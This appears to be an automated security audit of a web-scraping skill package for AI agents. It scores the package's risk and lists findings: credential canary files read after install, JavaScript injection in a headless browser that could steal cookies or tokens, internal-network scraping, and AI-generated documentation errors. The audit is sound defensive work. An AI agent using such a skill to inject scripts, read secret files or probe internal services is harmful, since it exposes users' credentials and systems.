Is codylrn804/crawl4ai safe?

https://github.com/openclaw/skills/tree/main/skills/codylrn804/crawl4ai

79
CAUTION

The crawl4ai skill is a documentation and utility script package for a Python web scraping library with no direct prompt injection attempts, no hardcoded malicious endpoints, and canary files confirmed intact. However, the skill exhibits significant quality problems — an offensive and fictitious API enum value (BrowserMode.SLAVERY), a missing documented file, and a runtime bug — all consistent with unreviewed AI-generated content. The core capability it teaches and enables (arbitrary JavaScript injection in a headless browser with full network access) creates a meaningful attack surface that could be exploited by a malicious actor controlling the agent's instructions. Canary file reads observed post-installation are attributed to the monitoring infrastructure rather than the skill itself.

Category Scores

Prompt Injection 88/100 · 30%
Data Exfiltration 73/100 · 25%
Code Execution 70/100 · 20%
Clone Behavior 87/100 · 10%
Canary Integrity 87/100 · 10%
Behavioral Reasoning 68/100 · 5%

Findings (7)

HIGH Canary Sensitive Files Read Post-Installation (Ambiguous Attribution) -15

Six canary files containing credentials and secrets (.env, .ssh/id_rsa, .aws/credentials, .npmrc, .docker/config.json, .config/gcloud/application_default_credentials.json) were accessed via open/read syscalls at timestamp 1771934028.837 — approximately 4 seconds after the skill was installed. An identical set of reads occurred at 1771934006.372, before the skill was even cloned. This dual-pattern (pre-install and post-install reads of identical files) is characteristic of the oathe monitoring system performing baseline canary verification. Canary integrity check confirms no modification. Attribution to skill activity cannot be conclusively ruled out but is considered unlikely given the evidence pattern.

MEDIUM Arbitrary JavaScript Injection in Headless Browser Taught as Core Pattern -20

The skill explicitly documents and promotes arbitrary JavaScript injection via the js_code parameter as a core Advanced Feature. Code examples show executing custom DOM manipulation and data extraction JS, with js_only=True mode to execute JS without downloading resources. An agent instructed to use this skill could inject malicious JavaScript to steal session cookies, CSRF tokens, form data, or access internal browser-accessible resources. The skill frames this as a legitimate, expected usage pattern.

MEDIUM Fictitious and Offensive API Enum Value in Documentation -15

The API reference documentation lists BrowserMode.SLAVERY as a valid enum value with description 'Use scraping ant technology'. This enum value does not exist in the actual crawl4ai open-source library. The offensive naming combined with a nonsensical description ('scraping ant technology') strongly indicates AI-generated documentation that was never reviewed by a human author with knowledge of the actual library. This raises fundamental questions about the skill author's credibility and whether any of the documented API surface is accurate.

LOW Runtime NameError Bug: BrowserMode Not Imported in extract_from_html.py -10

The script extract_from_html.py uses BrowserMode.LATEST in the crawler.arun() call but never imports BrowserMode from crawl4ai. This would cause an immediate NameError at runtime. The bug indicates the code was generated without execution testing, further corroborating that this is AI-generated content of poor quality.

LOW Documented Script File Missing from Package -5

SKILL.md documents clean_html.py as a resource in the scripts/ directory with description 'HTML cleaning utility', but this file is absent from the installed skill package. The package contains only scrape_single_page.py, scrape_multiple_pages.py, and extract_from_html.py. This indicates the skill was published incomplete or the documentation was generated for a planned-but-unimplemented file.

LOW Platform Gateway Established New External Connections Post-Install -8

After skill installation, the openclaw-gateway process (pid=1093) established two new ESTABLISHED connections to 3.213.170.18:443 (AWS EC2, us-east-1 region) that were absent pre-install. These connections are attributable to the ClawHub platform infrastructure reporting audit results, not to the skill itself. However, this represents new persistent external connectivity introduced coincident with installation.

INFO Headless Browser Enables Internal Network Reconnaissance and Data Exfiltration -12

The skill enables full headless browser operation against arbitrary URLs with JavaScript execution, custom headers (user-agent spoofing), session management, and file output. In an agent context where the agent has access to internal network addresses (cloud metadata APIs, admin panels, internal services), this skill could be directed to scrape sensitive internal resources and write results to disk for subsequent exfiltration. This is an inherent risk in any capable web scraping skill, not unique to this implementation.